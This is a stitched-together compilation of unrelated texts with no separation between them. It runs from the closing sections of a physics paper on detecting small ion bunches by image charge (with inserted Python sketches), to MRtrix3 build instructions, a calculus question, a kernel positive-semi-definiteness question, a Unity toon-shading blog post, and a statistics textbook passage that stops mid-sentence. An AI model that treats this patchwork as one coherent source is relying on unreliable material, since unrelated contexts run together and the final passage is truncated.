$${\rm{SNR}}=\frac{{V}_{{\rm{peak}}}}{\sqrt{{\rm{\Delta }}f}{v}_{{\rm{rms}}}}\mathrm{.}$$ (7) If the expected signal frequency is known, the existence of the signal can be probed in the Fourier spectrum, by setting a suitable threshold on a narrow interval around the expected frequency. 
If this threshold is exceeded, an ion or ion bunch is considered detected. In a deterministic single ion implantation process, the ion is permitted on its path to the sample only when the existence of the expected detector signal is registered (detection). This detection scheme has been tested for 4 keV Argon ion beam bunches in the live Fourier spectrum of single acquisitions using ICD2.5. Before the measurement, the ion beam current was lowered, so that a single bunch comprised approximately 300 ions, i.e. 300 elementary charges. In principle, the number of ions in each bunch might be subject to variations, as it cannot be measured simultaneously. The raw data shows that it is hardly possible to distinguish signal from noise in the time domain (Fig. 7). The number of detections divided by the total of 10⁴ acquisitions, which all contain an ion bunch signal, is called detection efficiency or rate (or true positive rate). In order to determine the false positive rate, the beam is switched off. Now, none of the acquisitions contains an ICD signal and the number of false detections is counted. The successful detection and false positive rates for different thresholds set in the Fourier spectrum are given in Table 1. As can be seen, increasing the threshold reduces the false positive rate very effectively with an acceptable reduction of the detection rate. In a deterministic ion implantation experiment, low false positive rates are essential for laying down error-free arrays of single atoms. Here, a detection rate of, for example, 50% means that on average every second ion is discarded by a beam blanker downstream of the ICD and not implanted, because the ion was not successfully detected with the ICD. Effectively, a lower detection rate only results in a reduced implantation rate. ## Discussion In the current set-up, specific limitations inhibit the demonstration of a lower detection limit for the charge of an ion bunch. These include the method of bunch formation with an electric blanker, limited Wien filter accuracy, ion beam divergence and instabilities at very low beam currents. It can clearly be seen that, because of this, the extracted signal deviates significantly from a sinusoidal waveform with constant amplitude (see Fig. 5a). Therefore, the total signal power is not solely associated with the fundamental frequency given by velocity and electrode period. This affects the ability to detect in Fourier space. For example, the noise floor in the spectrum in Fig. 5a corresponds to less than 20 µV or 40e, but multiples of this number of charges are needed for observation, because the main Fourier peak carries only part of the signal. Furthermore, the form of the signal from a bunch of ions is determined by the convolution of weighting potential and ion distribution. However, when considering single ions instead of bunches, an ideal geometry for creating sinusoidal signals can be constructed easily. The standard charge sensitive preamplifier used here proves to be applicable, but crucial improvements in the electronic noise performance are still possible and necessary for the intended application. The development of a voltage preamplifier without feedback components, which are not needed for the sinusoidal ICD signals, is underway. In addition, the capacitance of the electrode structure to ground needs to be as low as possible for optimal SNR34.
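To illustrate the frequency-domain detection scheme used above, the following self-contained Python sketch generates a short sinusoidal burst of known frequency buried in white noise, takes the FFT and applies a threshold in a narrow window around the expected frequency, counting true and false positives over many trials. All amplitudes, durations and the threshold are placeholder values chosen for illustration; they are not the measured parameters of ICD2.5.

```python
# Illustrative sketch of frequency-domain threshold detection (placeholder numbers,
# not the actual ICD2.5 acquisition parameters).
import numpy as np

rng = np.random.default_rng(0)
FS = 100e6            # sampling rate, Hz
T_TOTAL = 4e-6        # record length, s
T_BURST = 1e-6        # duration of the ion bunch signal, s
F_SIGNAL = 4.72e6     # expected signal frequency, Hz (cf. Fig. 5a)
A_SIGNAL = 40e-6      # signal amplitude, V (placeholder)
NOISE_RMS = 30e-6     # noise rms per sample, V (placeholder)
THRESHOLD = 3.5e-6    # threshold on the FFT magnitude, V (placeholder)

t = np.arange(0, T_TOTAL, 1 / FS)
burst = (t < T_BURST) * A_SIGNAL * np.sin(2 * np.pi * F_SIGNAL * t)
freqs = np.fft.rfftfreq(len(t), 1 / FS)
window = (freqs > F_SIGNAL - 0.5e6) & (freqs < F_SIGNAL + 0.5e6)

def detected(trace):
    spectrum = np.abs(np.fft.rfft(trace)) / len(trace)
    return spectrum[window].max() > THRESHOLD

n_trials = 1000
hits = sum(detected(burst + NOISE_RMS * rng.standard_normal(len(t))) for _ in range(n_trials))
false = sum(detected(NOISE_RMS * rng.standard_normal(len(t))) for _ in range(n_trials))
print(f"detection rate     : {hits / n_trials:.1%}")
print(f"false positive rate: {false / n_trials:.1%}")
```

Raising THRESHOLD trades detection rate against false positive rate, which is exactly the trade-off reported in Table 1.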
The detection and false positive rate measurements show that even for a signal very close to noise level, a threshold can be found to make detections in real time and exclude false positives with >99.9% probability. This threshold can be higher than the pure ICD signal, because the measurement contains the sum of signal and noise. At a low signal-to-noise ratio, there is a considerable probability that a component of the total noise spectrum contributes at the same frequency as the expected signal so that the sum of signal and noise surpasses the threshold, a phenomenon referred to as stochastic resonance35. For the aim of deterministic ion implantation, it will be required to open the beam blanker within a short time in the range of a few µs after ion detection in the ICD. The real time signal analysis demonstrated here uses a modern oscilloscope able to produce a 5 V trigger output signal in response to certain trigger conditions, useful for such purposes (delay time: manufacturer36 800 ns, measured 802.9 ± 0.1 ns). This time delay is compatible with the flight time of the ion from the ICD to the beam blanker. For the envisaged single ion detection setup, it is planned to use ions charged up to much more than one elementary charge, if necessary, substantially increasing the signal strength above the noise floor. In particular, heavy ions like arsenic, antimony and bismuth are becoming interesting for silicon quantum technologies14. Even if they are prepared in high charge states, their velocity is not much higher than that of light-weight ions for the same acceleration potential. Furthermore, straggling is reduced for higher ion masses, allowing for higher spatial precision of the ion implant14. Using Eq. 4, a figure of merit for a dedicated voltage preamplifier for single ion detection is developed. State-of-the-art input transistors can be optimised with an input capacitance of, e.g., 0.5 pF and a total input noise of $$0.3\,\mathrm{nV}/\sqrt{\mathrm{Hz}}$$. Suppose the whole image charge detector is split into individual segments, each connected to a transistor and preamplifier in order to reduce the input capacitance of each preamplifier. The outputs of the preamplifiers are then combined again. The electrodes connected to one transistor then exhibit a typical capacitance of 0.5 pF and the time-of-flight of one ion through the whole detector array is approximately 1 µs. For an n = 5 times charged ion, Vpeak = ne/Ctotal ≈ 800 nV and the SNR as in Eq. 7 equates to $$\mathrm{SNR}=\frac{800\,\mathrm{nV}}{\sqrt{1\,\mathrm{MHz}}\cdot 0.3\,\mathrm{nV}/\sqrt{\mathrm{Hz}}}=\frac{8}{3}.$$ (8) These realistic values yield an SNR close to three, which is sufficient for the envisaged detection, as the results above show. It is stressed that this realistic opportunity of ion detection for deterministic implantation is enabled only by the specific situation of ion pre-detection with a detection probability allowed to be smaller than one. If the task were to achieve a detection rate of 100% or measure unknown properties of an ion, the SNR would be insufficient. To estimate the maximum possible single ion implantation rate, the rate of ions arriving at the detector and the detection rate are limiting factors. It should be avoided that two or more ions are inside the detector at the same time. If the time needed to traverse the detector is on the order of 1 µs, the probability for more than one ion arriving within that time can be calculated from the Poisson distribution and a given rate of ions.
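The figure of merit in Eq. 8 and the pile-up estimate that follows can be reproduced with a few lines of Python. This is only a back-of-the-envelope sketch; the total input capacitance of 1 pF assumes that the 0.5 pF electrode and 0.5 pF transistor capacitances quoted above simply add, and the ion rate is the example value considered in the text.

```python
# Back-of-the-envelope check of Eq. 8 and of the Poisson pile-up estimate.
import math

E_CHARGE = 1.602e-19
N_CHARGES = 5            # example charge state
C_TOTAL = 1.0e-12        # assumed total input capacitance (electrode + transistor), F
NOISE_DENSITY = 0.3e-9   # input noise density, V / sqrt(Hz)
T_FLIGHT = 1e-6          # time of flight through the detector array, s

v_peak = N_CHARGES * E_CHARGE / C_TOTAL            # ~800 nV
bandwidth = 1.0 / T_FLIGHT                         # ~1 MHz
snr = v_peak / (math.sqrt(bandwidth) * NOISE_DENSITY)
print(f"V_peak = {v_peak * 1e9:.0f} nV, SNR = {snr:.2f}")   # ~2.7

# Probability of more than one ion arriving within one transit window,
# assuming Poisson arrivals at the example source rate.
RATE = 1e5                                         # ions per second
mu = RATE * T_FLIGHT                               # mean arrivals per window
p_pileup = 1.0 - math.exp(-mu) * (1.0 + mu)
print(f"P(more than one ion per window) = {p_pileup:.4f}")  # < 0.01
```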
For 1 × 10⁵ ions/s from the source, this probability is less than 0.01. With a detection rate of only 10%, about 1 × 10⁴ implanted ions per second is well achievable. Electrical switching times for beam blanking and scanning etc. should not impose any limitations in the microsecond regime. ## Conclusion With this work, the state-of-the-art of image charge measurements is expanded towards application and optimisation of the ICD principle to the detection of a small number of low energy ions, with the ultimate goal of single ion detection for deterministic ion implantation in future. The central aspect is the fly-by detection during a single pass, including signal analysis within a limited time of less than 2 µs. An image charge detection system has been built from scratch, deploying readily available and specifically designed electronics. Calibration and time-of-flight measurements were compared to theoretical considerations. Further, it was demonstrated how, by using a linear array of ICD electrodes, the real time data analysis of a single pass of an ion bunch can be transferred to the frequency domain, which is a significant ingredient for future single ion detection. A simple detection threshold can be found to exclude false positive detections with a probability close to one, while the detection rate is still above 25% for this critically low SNR. Work in the immediate future includes electrical simulations and experimental implementation of optimised electronics to lower the real time detection limit in the frequency domain below 10 elementary charges. Once again, it is stressed that the huge advantage of this approach to deterministic ion implantation is the possibility of discarding a certain fraction of ions from the source, allowing false positive detections to be sufficiently improbable. Live FFT, lock-in amplification or other algorithms implemented with dedicated electronics are tools that can be used to recover single ion fly-by signals in the frequency domain in real time, because the frequency of the signal is fixed and known. In addition to showing the feasibility and requirements of deterministic ion implantation via image charge detection, the knowledge gained is believed to be useful for the diagnostics and analysis of low current charged particle beams. ## References 1. 1. Meijer, J. et al. Generation of single color centers by focused nitrogen implantation. Applied Physics Letters 87, 261909, https://doi.org/10.1063/1.2103389 (2005). 2. 2. Rabeau, J. R. et al. Implantation of labelled single nitrogen vacancy centers in diamond using N15. Applied Physics Letters 88, 023113, https://doi.org/10.1063/1.2158700 (2006). 3. 3. Dolde, F. et al. Room-temperature entanglement between single defect spins in diamond. Nature Physics 9, 139–143 http://rdcu.be/vSwu. https://doi.org/10.1038/nphys2545 (2013). 4. 4. Lesik, M. et al. Production of bulk NV centre arrays by shallow implantation and diamond CVD overgrowth. Physica status solidi (a) 213, 2594–2600, https://doi.org/10.1002/pssa.201600219 (2016). 5. 5. Schmitt, S. et al. Submillihertz magnetic spectroscopy performed with a nanoscale quantum sensor. Science 356, 832–837 http://science.sciencemag.org/content/356/6340/832. https://doi.org/10.1126/science.aam5532 (2017). 6. 6. Yang, C. et al. Single phosphorus ion implantation into prefabricated nanometre cells of silicon devices for quantum bit fabrication. Japanese Journal of Applied Physics 42, 4124 http://stacks.iop.org/1347-4065/42/i=6S/a=4124 (2003). 7. 7.
van Donkelaar, J. et al. Single atom devices by ion implantation. Journal of Physics: Condensed Matter 27, 154204 http://stacks.iop.org/0953-8984/27/i=15/a=154204 (2015). 8. 8. Freer, S. et al. A single-atom quantum memory in silicon. Quantum Science and Technology 2, 015009 http://stacks.iop.org/2058-9565/2/i=1/a=015009 (2017). 9. 9. Pla, J. J. et al. A single-atom electron spin qubit in silicon. Nature 489, 541, https://doi.org/10.1038/nature11449 (2012). 10. 10. Pla, J. J. et al. High-fidelity readout and control of a nuclear spin qubit in silicon. Nature 496, 334 EP, https://doi.org/10.1038/nature12011 (2013). 11. 11. Jamieson, D. N. et al. Deterministic atom placement by ion implantation: Few and single atom devices for quantum computer technology. In 2016 21st International Conference on Ion Implantation Technology (IIT), 1–6 https://doi.org/10.1109/IIT.2016.7882858 (2016). 12. 12. DiVincenzo, D. P. The physical implementation of quantum computation. Fortschritte der Physik 48, 771–783 doi: 10.1002/1521-3978(200009)48:9/11<771::AID-PROP771>3.0.CO;2-E (2000). 13. 13. Shinada, T., Okamoto, S., Kobayashi, T. & Ohdomari, I. Enhancing semiconductor device performance using ordered dopant arrays. Nature 437, 1128–1131, https://doi.org/10.1038/nature04086 (2005). 14. 14. Jamieson, D. N. et al. Deterministic doping. Materials Science in Semiconductor Processing 62, 23–30 http://www.sciencedirect.com/science/article/pii/S1369800116304760. https://doi.org/10.1016/j.mssp.2016.10.039. Advanced doping methods in semiconductor devices and nanostructures (2017). 15. 15. Meijer, J. et al. Concept of deterministic single ion doping with sub-nm spatial resolution. Applied Physics A 83, 321–327, https://doi.org/10.1007/s00339-006-3497-0 (2006). 16. 16. Jacob, G. et al. Transmission microscopy with nanometer resolution using a deterministic single ion source. Phys. Rev. Lett. 117, 043001, https://doi.org/10.1103/PhysRevLett.117.043001 (2016). 17. 17. Matsukawa, T. et al. Development of single-ion implantation–controllability of implanted ion number. Applied Surface Science 117, 677–683 http://www.sciencedirect.com/science/article/pii/S0169433297801638. https://doi.org/10.1016/S0169-4332(97)80163-8 (1997). 18. 18. Pacheco, J. et al. Ion implantation for deterministic single atom devices. Review of Scientific Instruments 88, 123301, https://doi.org/10.1063/1.5001520 (2017). 19. 19. Gerlach, J. et al. Vorrichtung zur detektion einzelner geladener teilchen sowie system zur materialbearbeitung, das eine solche vorrichtung enthält https://www.google.com/patents/DE102015106769A1?cl=de. DE Patent App. DE201,510,106,769 (2016). 20. 20. Shockley, W. Currents to conductors induced by a moving point charge. Journal of Applied Physics 9, 635–636, https://doi.org/10.1063/1.1710367 (1938). 21. 21. Ramo, S. Currents induced by electron motion. Proceedings of the IRE 27, 584–585, https://doi.org/10.1109/JRPROC.1939.228757 (1939). 22. 22. Benner, W. H. A gated electrostatic ion trap to repetitiously measure the charge and m/z of large electrospray ions. Analytical Chemistry 69, 4162–4168, https://doi.org/10.1021/ac970163e (1997). 23. 23. Contino, N., Pierson, E., Keifer, D. & Jarrold, M. Charge detection mass spectrometry with resolved charge states. Journal of The American Society for Mass Spectrometry 24, 101–108, https://doi.org/10.1007/s13361-012-0525-5 (2013). 24. 24. Contino, N. C. & Jarrold, M. F. Charge detection mass spectrometry for single ions with a limit of detection of 30 charges. 
International Journal of Mass Spectrometry 345–347, 153–159 http://www.sciencedirect.com/science/article/pii/S1387380612002321. https://doi.org/10.1016/j.ijms.2012.07.010. 80/60: A special Issue honoring Keith R. Jennings and James H. Scrivens (2013). 25. 25. Pierson, E., Contino, N., Keifer, D. & Jarrold, M. Charge detection mass spectrometry for single ions with an uncertainty in the charge measurement of 0.65 e. Journal of The American Society for Mass Spectrometry 26, 1213–1220, https://doi.org/10.1007/s13361-015-1126-x (2015). 26. 26. Keifer, D. Z., Shinholt, D. L. & Jarrold, M. F. Charge detection mass spectrometry with almost perfect charge accuracy. Analytical Chemistry 87, 10330–10337 https://doi.org/10.1021/acs.analchem.5b02324. PMID: 26418830 (2015). 27. 27. Gamero-Castaño, M. Induction charge detector with multiple sensing stages. Review of Scientific Instruments 78 http://scitation.aip.org/content/aip/journal/rsi/78/4/10.1063/1.2721408. https://doi.org/10.1063/1.2721408 (2007). 28. 28. Smith, J. W., Siegel, E. E., Maze, J. T. & Jarrold, M. F. Image charge detection mass spectrometry: Pushing the envelope with sensitivity and accuracy. Analytical Chemistry 83, 950–956, https://doi.org/10.1021/ac102633p (2011). 29. 29. Barney, B. L., Daly, R. T. & Austin, D. E. A multi-stage image charge detector made from printed circuit boards. Review of Scientific Instruments 84 http://scitation.aip.org/content/aip/journal/rsi/84/11/10.1063/1.4828668. https://doi.org/10.1063/1.4828668 (2013). 30. 30. Simion version 8.1, http://www.simion.com/. Scientific Instrument Services Inc. 31. 31. A250CF specifications http://amptek.com/products/a250cf-coolfet-charge-sensitive-preamplifier. Amptek, Inc (2017). 32. 32. A250 specifications http://amptek.com/products/a250-charge-sensitive-preamplifier/. Amptek, Inc (2017). 33. 33. Alexander, J. D. et al. Determination of absolute ion yields from a maldi source through calibration of an image-charge detector. Measurement Science and Technology 21, 045802, http://stacks.iop.org/0957-0233/21/i=4/a=045802 (2010). 34. 34. Schmidt, S. et al. Non-destructive single-pass low-noise detection of ions in a beamline. Review of Scientific Instruments 86, 113302, https://doi.org/10.1063/1.4935551 (2015). 35. 35. Gammaitoni, L., Hänggi, P., Jung, P. & Marchesoni, F. Stochastic resonance. Rev. Mod. Phys. 70, 223–287, https://doi.org/10.1103/RevModPhys.70.223 (1998). 36. 36. Rohde & Schwarz, München. RTO Digital Oscilloscope Manual (2017). ## Acknowledgements We are thankful to our technical staff, Ronny Woyciechowski, Carsten Pahnke and Dipl.-Ing. Joachim Starke, as well as the staff at the workshops at Universität Leipzig and Leibniz Institute of Surface Engineering (IOM). We acknowledge the support by Raith GmbH Dortmund and Dreebit GmbH Großröhrsdorf. Furthermore, we thank Prof. Dr. S. Rauschenbach (University of Oxford and MPI Stuttgart), Dr. Stefan Stahl (Stahl Electronics Mettenheim) as well as Dr. Alexander Jakob and Prof. Dr. David N. Jamieson (University of Melbourne) for insightful discussions. This work is carried out within the Leibniz Joint Lab “Single Ion Implantation”, and funded by the Leibniz Association (SAW-2015-IOM-1), the European Union together with the Sächsisches Ministerium für Wissenschaft und Kunst (Project No. 100308873), the Volkswagen Stiftung and the German Academic Exchange Service (DAAD). We acknowledge support from the German Research Foundation (DFG) and Universität Leipzig within the program of Open Access Publishing. 
## Author information Authors ### Contributions P.R. conducted the experiments, analysed the results with input from D.S. and J.M. and wrote the article. All authors contributed to setting up the experiment, discussed and reviewed the manuscript. ### Corresponding author Correspondence to Paul Räcke. ## Ethics declarations ### Competing Interests The authors declare no competing interests. Publisher's note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. ## Rights and permissions Reprints and Permissions Räcke, P., Spemann, D., Gerlach, J.W. et al. Detection of small bunches of ions using image charges. Sci Rep 8, 9781 (2018). https://doi.org/10.1038/s41598-018-28167-6
# Building MRtrix3 from source¶ The instructions below describe the process of compiling and installing MRtrix3 from source. Please consult the MRtrix3 forum if you encounter any issues. Warning These instructions are for more advanced users who wish to install very specific versions of MRtrix3, or make their own modifications. Most users will find it much easier to install one of the pre-compiled packages available for their platform from the main MRtrix3 website. ## Install Dependencies¶ To install MRtrix3, you will need to have a number of dependencies available on your system, listed below. These can be installed in a number of ways, depending on your specific platform. We provide specific instructions for doing so for GNU/Linux, macOS and Microsoft Windows in the subsequent sections. Required dependencies: • a C++11 compliant compiler (GCC version >= 5, clang); • Python version >= 3.3; • The zlib compression library; • Eigen version >= 3.2 (>= 3.3 recommended); • Qt version >= 5.5 (but not Qt 6) [GUI components only]; and optionally: • libTIFF version >= 4.0 (for TIFF support); • FFTW version >= 3.0 (for improved performance in certain applications, currently only mrdegibbs); • libpng (for PNG support). The instructions below list the most common ways to install these dependencies on Linux, macOS, and Windows platforms. Warning To run the GUI components of MRtrix3 (mrview & shview), you will also need an OpenGL 3.3 compliant graphics card and corresponding software driver. Note that this implies you cannot run the GUI components over a remote X11 connection, since it can’t support OpenGL 3.3+ rendering. The most up-to-date recommendations in this context can be found in the relevant Wiki entry on the MRtrix3 community forum. ### Linux¶ The installation procedure will depend on your system. Package names may change between distributions, and between different releases of the same distribution. We provide commands to install the required dependencies on some of the most common Linux distributions below. Warning The commands below are suggestions based on what has been reported to work in the past, but may need to be tailored for your specific distribution. See below for hints on how to proceed in this case. • Ubuntu Linux (and derivatives, e.g. Linux Mint): sudo apt-get install git g++ python3 libeigen3-dev zlib1g-dev libqt5opengl5-dev libqt5svg5-dev libgl1-mesa-dev libfftw3-dev libtiff5-dev libpng-dev • RPM-based distros (Fedora, CentOS): sudo yum install git g++ python3 eigen3-devel zlib-devel libqt5-devel libgl1-mesa-dev fftw-devel libtiff-devel libpng-devel On Fedora 24, this is reported to work: sudo yum install git gcc-c++ python3 eigen3-devel zlib-devel qt-devel mesa-libGL-devel fftw-devel libtiff-devel libpng-devel • Arch Linux: sudo pacman -Syu git python gcc zlib eigen qt5-svg fftw libtiff libpng You may find that your package installer is unable to find the packages listed, or that the subsequent steps fail due to missing dependencies (particularly the ./configure command). In this case, you will need to search the package database and find the correct names for these packages: • git; • an appropriate C++ compiler (e.g. GCC 5 or above, or clang); • Python version >= 3.3; • the zlib compression library and its corresponding development header/include files; • the Eigen template library (only consists of development header/include files); • Qt version >= 5.5, its corresponding development header/include files, and the executables required to compile the code.
Note that this can be broken up into several packages, depending on how your distribution has chosen to distribute this. You will need to get those that provide these Qt modules: Core, GUI, OpenGL, SVG, and the qmake, rcc & moc executables (note these will probably be included in one of the other packages); • [optional] the TIFF library and utilities version >= 4.0, and its corresponding development header/include files; • [optional] the FFTW library version >= 3.0, and its corresponding development header/include files; • [optional] the PNG library and its corresponding development header/include files. Warning Compilers included in older distributions, e.g. Ubuntu 12.04, may not be capable of compiling MRtrix3, as it requires C++11 support. A solution is to install a newer compiler as provided by an optional addon package repository, e.g. the Ubuntu toolchain PPA. Once the relevant repository has been added to the distribution’s package manager, you’ll need to update the local list of available packages (e.g. sudo apt-get update), followed by explicit installation of the newer version of the compiler (e.g. sudo apt-get install g++-7). Note In many instances where MRtrix3 dependencies are installed in some non-standard fashion, the MRtrix3 configure script will not be able to automatically identify the location and/or appropriate configuration of those dependencies. In such cases, the MRtrix3 configure script provides a range of environment variables that can be set by the user in order to provide this information. Executing configure -help provides a list of such environment variables; in addition, if the script is unable to detect or utilise a particular dependency properly, it will also provide a suggestion of which environment variable may need to be set in a manner tailored for your particular system in order to provide it with the information it needs to locate that dependency. If for whatever reasons you need to install MRtrix3 on a system with older dependencies, and you are unable to update the software (e.g. you want to run MRtrix3 on a centrally-managed HPC cluster), you can as a last resort use the procedures described in this community forum post. ### macOS¶ 1. Update macOS to version 10.10 (Yosemite) or higher (OpenGL 3.3 will typically not work on older versions); 2. Install XCode from the App Store; 3. Install Eigen3 and Qt5. There are several alternative ways to do this, depending on your current system setup. The most convenient is probably to use your favorite package manager (Homebrew or MacPorts), or install one of these if you haven’t already. If you find your first attempt doesn’t work, please resist the temptation to try one of the other options: in our experience, this only leads to further conflicts, which won’t help installing MRtrix3 and will make things more difficult to fix later. Once you pick one of these options, we strongly recommend you stick with it, and consult the community forum if needed for advice and troubleshooting. 
• With Homebrew: • Install Eigen3: brew install eigen • Install Qt5: brew install qt5 • Install pkg-config: brew install pkg-config • Add Qt’s binaries to your path: export PATH=`brew --prefix`/opt/qt5/bin:$PATH • With MacPorts: • Install Eigen3: port install eigen3 • Install Qt5: port install qt5 • Install pkg-config: port install pkgconfig • Add Qt’s binaries to your path: export PATH=/opt/local/libexec/qt5/bin:$PATH • As a last resort, you can manually install Eigen3 and Qt5: You can use this procedure if you have good reasons to avoid the other options, or if for some reason you cannot get either Homebrew or MacPorts to work. You need to select the file labelled qt-opensource-mac-x64-clang-5.X.X.dmg. You can choose to install it system-wide or just in your home folder, whichever suits; just remember where you installed it. • Make sure Qt5 tools are in your PATH (edit as appropriate): export PATH=/path/to/Qt5/5.X.X/clang_64/bin:$PATH • Set the CFLAG variable for Eigen (edit as appropriate): export EIGEN_CFLAGS="-isystem /where/you/extracted/eigen" Make sure not to include the final /Eigen folder in the path name: use the folder in which it resides instead! 4. Install TIFF, FFTW and PNG libraries. • With Homebrew: • Install TIFF: brew install libtiff • Install FFTW: brew install fftw • Install PNG: brew install libpng • With MacPorts: • Install TIFF: port install tiff • Install FFTW: port install fftw-3 • Install PNG: port install libpng ### Windows¶ All of these dependencies are installed below by the MSYS2 package manager. Warning When following the instructions below, use the ‘MinGW-w64 Win64 shell’; ‘MSYS2 shell’ and ‘MinGW-w64 Win32 shell’ must be avoided, as they will yield erroneous behaviour that is difficult to diagnose if used accidentally. Warning At time of writing, this MSYS2 system update will give a number of instructions, including: terminating the terminal when the update is completed, and modifying the shortcuts for executing the shell(s). Although these instructions are not as prominent as they could be, it is vital that they are followed correctly! 1. Download and install the most recent 64-bit MSYS2 installer from http://msys2.github.io/ (msys2-x86_64-*.exe), and follow the installation instructions from the MSYS2 wiki. 2. Run the program ‘MinGW-w64 Win64 Shell’ from the start menu. 3. Update the system packages, as per the instructions: pacman -Syuu Close the terminal, start a new ‘MinGW-w64 Win64 Shell’, and repeat as necessary until no further packages are updated. 4. From the ‘MinGW-w64 Win64 Shell’ run: pacman -S git python3 pkg-config mingw-w64-x86_64-gcc mingw-w64-x86_64-eigen3 mingw-w64-x86_64-qt5 mingw-w64-x86_64-fftw mingw-w64-x86_64-libtiff mingw-w64-x86_64-libpng Sometimes pacman may fail to find a particular package from any of the available mirrors. If this occurs, you can download the relevant package from SourceForge: place both the package file and corresponding .sig file into the /var/cache/pacman/pkg directory, and repeat the pacman call above. Sometimes pacman may refuse to install a particular package, claiming e.g.: error: failed to commit transaction (conflicting files) mingw-w64-x86_64-eigen3: /mingw64 exists in filesystem Errors occurred, no packages were upgraded. Firstly, if the offending existing target is something trivial that can be deleted, this is all that should be required.
Otherwise, it is possible that MSYS2 may mistake a file existing on the filesystem as a pre-existing directory; a good example is that quoted above, where pacman claims that directory /mingw64 exists, but it is in fact the two files /mingw64.exe and /mingw64.ini that cause the issue. Temporarily renaming these two files, then changing their names back after pacman has completed the installation, should solve the problem. ## Git setup¶ If you intend to contribute to the development of MRtrix3, set up your git environment as per the Git instructions page. ## Build MRtrix3¶ 1. Clone the MRtrix3 repository: git clone https://github.com/MRtrix3/mrtrix3.git or if you have set up your SSH keys (for contributors): git clone git@github.com:MRtrix3/mrtrix3.git 2. Configure the MRtrix3 install: cd mrtrix3 ./configure If this does not work, examine the ‘configure.log’ file that is generated by this step; it may give clues as to what went wrong. 3. Build the binaries: ./build ## Set up MRtrix3¶ 1. Update the shell startup file, so that the locations of MRtrix3 commands and scripts will be added to your PATH environment variable. If you are not familiar or comfortable with modification of shell files, MRtrix3 now provides a convenience script that will perform this setup for you (assuming that you are using bash or equivalent interpreter). From the top level MRtrix3 directory, run the following: ./set_path 2. Close the terminal and start another one to ensure the startup file is read (or just type ‘bash’) 3. Type mrview to check that everything works 4. You may also want to have a look through the List of MRtrix3 configuration file options and set anything you think might be required on your system. Note The above assumes that your shell will read the ~/.bashrc file at startup time. This is not always guaranteed, depending on how your system is configured. If you find that the above doesn’t work (e.g. typing mrview returns a ‘command not found’ error), try changing step 1 to instruct the set_path script to update PATH within a different file, for example ~/.bash_profile or ~/.profile, e.g. as follows: ./set_path ~/.bash_profile ## Keeping MRtrix3 up to date¶ 1. You can update your installation at any time by opening a terminal in the MRtrix3 folder, and typing: git pull ./build 2. If this doesn’t work immediately, it may be that you need to re-run the configure script: ./configure and then run step 1 again.
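For reference, the complete sequence on a Debian/Ubuntu-style system, condensed from the commands documented above, looks roughly as follows (package names, paths and shell syntax may need adjusting for your distribution and shell):

```
sudo apt-get install git g++ python3 libeigen3-dev zlib1g-dev libqt5opengl5-dev \
    libqt5svg5-dev libgl1-mesa-dev libfftw3-dev libtiff5-dev libpng-dev
git clone https://github.com/MRtrix3/mrtrix3.git
cd mrtrix3
./configure
./build
./set_path
```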
# Change of concavity

Any graph $$y=f(x)$$ whose first derivative is given by $$y'=6(x+1)(x-2)^2$$ has its point(s) of inflection at

(1) $$x=0$$
(2) $$x=-1, 2$$
(3) $$x=2$$
(4) $$x=0, 2$$
## How to show that the matrix $[\min(x_i,x_j)]$ is positive semi-definite? Well, I want to show that a function is a valid kernel function. The function is $$k(x,z)=\min(x,z)$$ Thus, I formed an $$N\times N$$ kernel (Gram) matrix $$K=[k(x_i,x_j)]$$ for a data set $$x_i$$, $$i=1,\dots,N$$. How do I show that this matrix is positive semi-definite (see page 4 of the pdf)?
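One standard route, sketched here under the assumption that the data points are non-negative ($$x_i \ge 0$$, as is typical when this kernel is used): for $$x,z\ge 0$$ one can write

$$\min(x,z)=\int_{0}^{\infty}\mathbf{1}[t\le x]\,\mathbf{1}[t\le z]\,\mathrm{d}t,$$

so for any vector $$a\in\mathbb{R}^N$$,

$$a^{\top}Ka=\sum_{i,j}a_i a_j \min(x_i,x_j)=\int_{0}^{\infty}\Big(\sum_{i=1}^{N}a_i\,\mathbf{1}[t\le x_i]\Big)^{2}\,\mathrm{d}t\;\ge\;0,$$

hence $$K$$ is positive semi-definite. Equivalently, $$\min(x,z)$$ is the covariance kernel of a standard Wiener process on $$[0,\infty)$$.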
teaching machines Toon shading in Unity We were curious if we could incorporate cel-shading into Unity. Yes, it can be incorporated pretty easily by: 1. Importing the Toon Shading package. 2. Going to all Mesh Renderer components and switching the material to one of the four toon materials that we imported. Applying toon material to terrain took some searching, as the terrain shader isn’t tweakable via the GUI. The simplest solution I found was to open up the toon material, click Edit to adjust the shader code, and change the first line to Shader "Hidden/TerrainEngine/Splatmap/Lightmap-FirstPass" { I don’t know how good of an idea it was to do this, but it worked. The terrain was cel-shaded after I saved the edits. Here’s a short walkthrough: A playable version exists too.
# 7.1 A single population mean using the normal distribution ## Try it Refer back to the pizza-delivery Try It exercise. The mean delivery time is 36 minutes and the population standard deviation is six minutes. Assume the sample size is changed to 50 restaurants with the same sample mean. Find a 90% confidence interval estimate for the population mean delivery time. (34.6041, 37.3958) ## Working backwards to find the error bound or sample mean When we calculate a confidence interval, we find the sample mean, calculate the error bound, and use them to calculate the confidence interval. However, sometimes when we read statistical studies, the study may state the confidence interval only. If we know the confidence interval, we can work backwards to find both the error bound and the sample mean. ## Finding the Error Bound • From the upper value for the interval, subtract the sample mean, • OR, from the upper value for the interval, subtract the lower value. Then divide the difference by two. ## Finding the Sample Mean • Subtract the error bound from the upper value of the confidence interval, • OR, average the upper and lower endpoints of the confidence interval. Notice that there are two methods to perform each calculation. You can choose the method that is easier to use with the information you know. Suppose we know that a confidence interval is (67.18, 68.82) and we want to find the error bound. We may know that the sample mean is 68, or perhaps our source only gave the confidence interval and did not tell us the value of the sample mean. ## Calculate the error bound: • If we know that the sample mean is 68: EBM = 68.82 – 68 = 0.82. • If we don't know the sample mean: EBM = $\frac{\left(68.82-67.18\right)}{2}$ = 0.82. ## Calculate the sample mean: • If we know the error bound: $\overline{x}$ = 68.82 – 0.82 = 68 • If we don't know the error bound: $\overline{x}$ = $\frac{\left(67.18+68.82\right)}{2}$ = 68. ## Try it Suppose we know that a confidence interval is (42.12, 47.88). Find the error bound and the sample mean. Sample mean is 45, error bound is 2.88 ## Calculating the sample size n If researchers desire a specific margin of error, then they can use the error bound formula to calculate the required sample size. The error bound formula for a population mean when the population standard deviation is known is EBM = $\left({z}_{\frac{\alpha }{2}}\right)\left(\frac{\sigma }{\sqrt{n}}\right)$ . The formula for sample size is n = $\frac{{z}^{2}{\sigma }^{2}}{EB{M}^{2}}$ , found by solving the error bound formula for n . In this formula, z is 